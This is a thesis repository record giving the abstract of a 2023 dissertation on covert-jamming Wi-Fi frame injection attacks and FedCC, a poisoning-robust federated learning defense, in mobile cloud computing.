Adversarial Attack and Defense in AI-based Mobile Cloud Computing Systems
- Abstract
- Mobile cloud computing utilizes cloud server computing technology to provide various application services to mobile clients.
The mobile cloud computing framework provides cloud computing resources to clients through systematic communication and develops artificial intelligence-based services using data collected from clients.
In a mobile cloud computing environment, the use of federated learning techniques solves the problem of data privacy and data collection costs.
Because the cloud server trains an artificial model using each locally trained model from clients without the client’s data stored on the cloud.
However, AI-based mobile cloud computing services utilizing federated learning techniques are affected by malicious client attacks, such as exploiting vulnerabilities in various network environments.
Furthermore, there are a lot of vulnerabilities to malicious clients’ attacks because the federated learning framework provides free participation from various mobile devices.
In this dissertation, we consider the security issues that can arise in the process of communicating cloud servers and clients over the network, and of the federated learning process.
In the first part of this dissertation, we introduce malicious data frame injection attacks that do not require hijacking associations between an access point (AP) and clients utilizing a covert jamming technique in IEEE 802.11 wireless LAN environments.
We implement the proposed attack node by using software-defined radios (SDR) to transmit jamming signals and manipulated Wi-Fi medium access control (MAC) frames.
In addition, we use the Python Scapy library with wireless LAN cards to transmit malicious data frames containing the wrong HTTP requests payload.
We build a testbed where MCC's clients and servers communicate with an HTTP application protocol through IEEE 802.11 and show that the proposed attack works well even in the presence of encryption protocols such as WPA2.
In the second part of this dissertation, we propose federated learning with consensus confirmation (FedCC), which applies a global model contamination verification algorithm that has robustness for malicious client attacks.
In addition, we define attack success probabilities in the presence of malicious clients in a federated learning environment and show the FedCC has more robust than previous FL algorithms.
Through experiments using MNIST and Fashion-MNIST datasets, we demonstrate that the proposed consensus confirmation rule can be applied to various FL algorithms, and we show that FedCC is safer than previous FL algorithms in the presence of data poisoning or model poisoning attacks.
- Author(s)
- Woocheol Kim
- Issued Date
- 2023
- Type
- Thesis
- URI
- https://scholar.gist.ac.kr/handle/local/18846
- 공개 및 라이선스
-
- 파일 목록
-
Items in Repository are protected by copyright, with all rights reserved, unless otherwise indicated.